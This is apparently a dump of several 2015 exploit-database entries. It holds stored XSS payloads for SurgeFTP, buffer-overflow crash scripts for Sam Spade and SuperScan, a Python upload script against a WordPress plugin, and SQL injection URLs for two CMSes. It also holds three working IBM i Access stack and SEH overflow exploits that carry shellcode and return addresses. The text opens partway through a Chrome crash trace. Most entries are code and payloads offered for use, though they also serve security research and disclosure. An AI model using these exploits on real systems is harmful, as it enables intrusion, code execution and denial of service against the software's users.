#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
#5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424
#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673
#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip
********************************************************************************************
# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities
# Date: 11/18/2015
# Exploit Author: Un_N0n
# Vendor: NetWin
# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
# Version: 23d6
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities.
They are:
Stored XSS in 'Domain Name' field.
[How to?]
1. Open SurgeFTP web interface, Click on global option from the menu.
2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section.
Stored XSS in 'Mirrors'.
[How to?]
1. Open surgeftp web interface, Click on 'Mirrors' option from the menu.
2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field.
Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP.
Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload
which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload,
therefore White-listing is the correct solution.
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
# Discovery by : Vivek Mahajan - c3p70r
# Discovery Date : 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
buffer = "A"*510
file = open("spade.txt, 'w')
file.write(buffer)
file.close()
# Follow on twitter @vik.create
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#00E3FF88 41414141 AAAA
#00E3FF8C 41414141 AAAA
#00E3FF90 41414141 AAAA
#00E3FF94 41414141 AAAA
#00E3FF98 42424242 BBBB Pointer to next SEH record
#00E3FF9C 43434343 CCCC SE handler
# And the Registers
#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141
buffer = "\x41" * 328
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed
buffer = "\x41" * 280
eip = "\x42" * 4
f = open ("super_scan_4.1_tools.txt", "w")
f.write(buffer + eip)
f.close()
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
================================================================================
WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.
Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
Details
================================================================================
The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
```php
if (isset($_POST['uultra-form-cvs-form-conf']))
{
/* Let's Update the Profile */
$this->process_cvs($_FILES);
}
```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension
In addition we mark the following points:
1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site
PoC
================================================================================
The following Python3 script forms a csv file and uploads it to a site
```python3
#!/usr/bin/python3
import requests
import csv
import tempfile
url = 'http://example.com/'
postData = {
'uultra-form-cvs-form-conf': 1,
'uultra-send-welcome-email': 1,
'uultra-activate-account': 'pending'
}
csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)
csvFile.seek(0)
files = {'file.csv': csvFile}
r = requests.post(url, data=postData, files=files)
exit(0)
```
Timeline
================================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released
Solution
================================================================================
Update to version 1.5.59
source: https://www.securityfocus.com/bid/62186/info
Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/blog/index.asp?archivem='
source: https://www.securityfocus.com/bid/62146/info
dBlog CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/dblog/storico.asp?m=[Sql Injection]
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt
Vendor:
==============
www.ibm.com
Product:
====================================================
IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected
Vulnerability Type:
=======================
Stack Buffer Overflow
Arbitrary Code Exec
CVE Reference:
==============
CVE-2015-2023
Vulnerability Details:
=====================
IBM i Access for Windows is vulnerable to a buffer overflow. A local
attacker could overflow a buffer and execute arbitrary code on the Windows PC.
client Access has ability to receive remote commands via "Cwbrxd.exe"
service
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253
"Incoming remote command was designed for running non-interactive commands
and programs on a PC", therefore a remote attacker could execute arbitrary code on the system.
Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.
The buffer overflow vulnerability can be remediated by applying Service
Pack SI57907.
The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html
Workarounds and Mitigations
None known
CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the
current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)
Exploit code(s):
==============================================================================
Three python POC scriptz follow that exploitz various component of IBM i
Access.
1) Exploits "ftdwprt.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access
# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
(C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
rp=struct.pack('<L', 0x638091FB)
payload="A" * 1043+rp+sc+"\x90"*20
subprocess.Popen([pgm, payload], shell=False) #<----1043 bytes outside of
debugger use 1044 in debugger.
==================================
2) Exploits "ftdwinvw.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwinvw.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#payload="A"*1044+"RRRR"+"\x90"*10+"B"*100 #Test EIP
rp=struct.pack('<L', 0x638091fb) #CALL ESP (0x638091fb) FTDBDT.dll
payload="A"*1044+rp+"\x90"*10+sc #KABOOM!!!
subprocess.Popen([pgm, payload], shell=False)
registers dump...
EAX 0000040B
ECX 0044AAB8 ASCII "AAAAAAAAA...
EDX 7F17E09F
EBX 00000000
ESP 0018E5B8
EBP 41414141
ESI 005A9FB9 ASCII "AAAAAAAAA...
EDI 0044E94C ftdwinvw.0044E94C
EIP 52525252 <----------BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
3) Exploits "PCSWS.exe", structured exeception handler (SEH) overwrite
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\Emulator\\pcsws.exe "
#ctrl EIP at 1340 bytes, ESP points to RETURN to ntdll.770BB499 so we will
jump 8 bytes to our SC
#as ESP points to our SC 8 bytes after!
jmp="\xEB\x06"+"\x90"*2
#payload="A"*1336+"BBBB" #Test
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
rp=struct.pack('<L', 0x678c1e49) #pop pop ret 0x67952486
PCSW32X.dll
payload="A"*1332+jmp+rp+sc+"\x90"*10 #KABOOOOOOOOOOOOOOOOOOM!
subprocess.Popen([pgm, payload], shell=False)
register dump...
0018FF6C 41414141 AAAA
0018FF70 41414141 AAAA
0018FF74 41414141 AAAA
0018FF78 41414141 AAAA Pointer to next SEH record
0018FF7C 42424242 BBBB SE handler
0018FF80 004C0400 .L. pcsws.004C0400
Disclosure Timeline:
====================================
Vendor Notification: May 21, 2015
November 18, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
=================================================================================
Request Method(s): [+] local or remote commands via "Cwbrxd.exe"
service
Vulnerable Product: [+] IBM i Access for Windows Release 7.1
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx